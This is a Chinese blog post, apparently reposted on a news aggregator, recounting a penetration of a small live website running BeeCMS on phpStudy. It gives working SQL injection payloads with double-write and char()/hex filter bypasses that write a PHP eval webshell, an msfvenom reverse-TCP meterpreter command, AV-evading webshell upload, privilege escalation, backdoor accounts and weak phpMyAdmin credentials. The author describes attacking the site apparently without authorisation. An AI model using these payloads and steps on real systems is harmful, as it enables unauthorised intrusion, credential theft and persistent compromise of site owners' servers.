Bendi新闻
>
记一次小H站渗透过程,实操!

记一次小H站渗透过程,实操!

10月前

来源:https://blog.csdn.net/qq_42111373/article/details/105667190
# 前言
记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。
#  渗透过程
无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,这里贴一个链接:Beecms 通用漏洞
这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php
通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入
可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过
发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以。
方法一
1、通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点
2、一把梭,发现并没有,使用脚本也没有绕过
方法二
1、通过burp抓包,写入一句话,payload:admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[123]);?> into outfile 'xm.php'#,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过。

2、对shell部分进行编码
3、写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。
ps:这里的写入路径纯属盲猜,运气好,默认目录
4、用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲
char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#
一样成功写入
1、写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下
2、md5解密,wocao,成功登陆,然后就是后台找上传了
# 后渗透
通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去
方法一
1、通过msf生成木马提权,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听
2、不知道什么问题,用这个没有成功,那么只能通过大马提权了
方法二
1、上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传
2、访问大马
3、这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。
4、创建admin权限账号之后,登陆服务器
# 其他发现
通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell。
# 总结
  • 1、前台sql注入获取用户名密码,进入后台找上传
  • 2、SQL注入语句写入一句话
  • 3、phpmyadmin一句话getshell
  • 4、上传大马提权
至此,渗透结束。

END

官方站点:www.linuxprobe.com

Linux命令大全:www.linuxcool.com

刘遄老师QQ:5604215

Linux技术交流群:2636170

(新群,火热加群中……)

想要学习Linux系统的读者可以点击"阅读原文"按钮来了解书籍《Linux就该这么学》,同时也非常适合专业的运维人员阅读,成为辅助您工作的高价值工具书!


微信扫码关注该文公众号作者

来源:Linux就该这么学

相关新闻

免费试听|三大财务报表、估值建模、DCF项目实操等投行必备技能一次搞定!1周写不完5000字综述?!我惨遭师兄嘲讽:卷论文,先学用AI!(有实操演示)抄作业 | 万字长文:数据资产入表全流程,实操指南!哈佛 & 谷歌金牌面试官送出:入读美国名校的10步实操指南!实拍!和小分队一起逛全美最大餐饮展交通罚单不再有实时小票!悉尼议会推出新系统,司机面临“误判”风险超详细:ChatGPT实操全流程!最新数据公布:澳洲这里马上被印度同化!房屋,街道都在变,小印度实锤了!8月文书营报名倒计时!一次搞定主文书/小文书和活动列表最高监禁14年!“公交暴徒”要求隐名!这一次,新西兰华人站出来了!他们将走上街头,为被袭少年发声!AP考试大规模取消成绩殃及无辜!这3点实操建议考生们赶紧收藏冲上热搜!B站崩了,小红书也崩了!阿里云紧急回应→英伟达一季报要来了!这一次,动静不会小?一生一次土耳其!轻奢小团上线!跟随纽约领队一起出发!科研工作坊预告:多篇顶级论文发表导师,带你实操探索科研之路!B站来了!飞天小女警也来了!武汉五一冲这里!公众号写作7篇出爆款,4天赚了2000+,实操干货分享!延毕1年后,师兄竟靠AI直接逆袭!连发3篇生信SCI!(有AI工具+实操教程)这一次我站张雪峰!2024年报志愿,千万不要抄底金融专业!震惊!人山人海围观原配现场抓渣男和丰满小三车内出轨实拍!B 站、小红书崩了!罪魁祸首竟然是。。警惕!纽约近期已发生多起 小h书换汇 被人“放长线钓大鱼”!哈佛金牌面试官:锁定这10步黄金实操法则,孩子随时名校ready!哈佛及谷歌金牌面试官硬核开讲!2025名校申请10步实操罗盘法则全揭秘!
logo
联系我们隐私协议©2024 bendi.news
Bendi新闻
Bendi.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Bendi.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。